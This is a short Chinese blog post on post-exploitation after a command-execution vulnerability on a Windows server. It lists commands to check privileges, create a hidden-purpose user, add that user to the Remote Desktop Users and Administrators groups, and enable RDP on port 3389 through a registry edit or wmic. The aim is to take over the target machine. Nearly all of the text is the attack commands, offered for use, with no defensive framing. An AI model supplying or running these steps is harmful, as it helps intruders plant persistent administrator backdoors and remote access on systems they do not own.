2023年第一篇博客,好久没有更新了,今天简单记录一下windows在写用户时的一些注意事项。
在实战中碰到一些命令执行的漏洞,如果是linux系统,那我们都很熟悉,可以通过反弹shell,来接管目标服务器,那么windows可能需要多一些操作。
1.有回显的情况下可以使用
whoami
net user 来查看当前当前用户是否具有写用户的权限
2.新建用户
这个应该都很熟了,不过需要注意的是在windows服务器是存在密码复杂策略的,如果想创建用户最好设置一个复杂点的密码,像test/test是肯定不行的,所以有时候出现问题并不是命令执行被拦截,而是出在这些基础命令上面
net user 用户名 密码 /add
当然光创建还不行,需要给这个用户加入远程访问组里,不然直接连会出现下面的状况
3.加入远程桌面用户组
net localgroup "Remote Desktop Users" test /add
此时虽然可以进行远程访问,但该用户仅仅只是一个普通用户权限,需要将其加入管理员组,让其拥有足够的权限,这样我们访问过去才能进行更多的操作
4.加入管理员组
net localgroup Administrators test /add
这四条命令执行完后就可以连接上我们的目标了
那么以上是在目标服务器开启远程桌面的前提下,可以直接进行连接,如果没开启3389端口,则需要使用以下命令进行开启
通过cmd命令开启和关闭3389端口
Windows cmd命令如何打开?快捷键 Win键+r打开运行,输入“cmd”即可打开cmd命令行模式,执行下列命令即可
开启3389端口的命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f关闭3389端口的命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
将开启3389端口命令中的“00000000”改成“11111111”就是关闭。
也可以通过这个cmd命令开启3389端口: wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1那么今天就先写这么多,有时间在整理一下其他的知识点
评论 (0)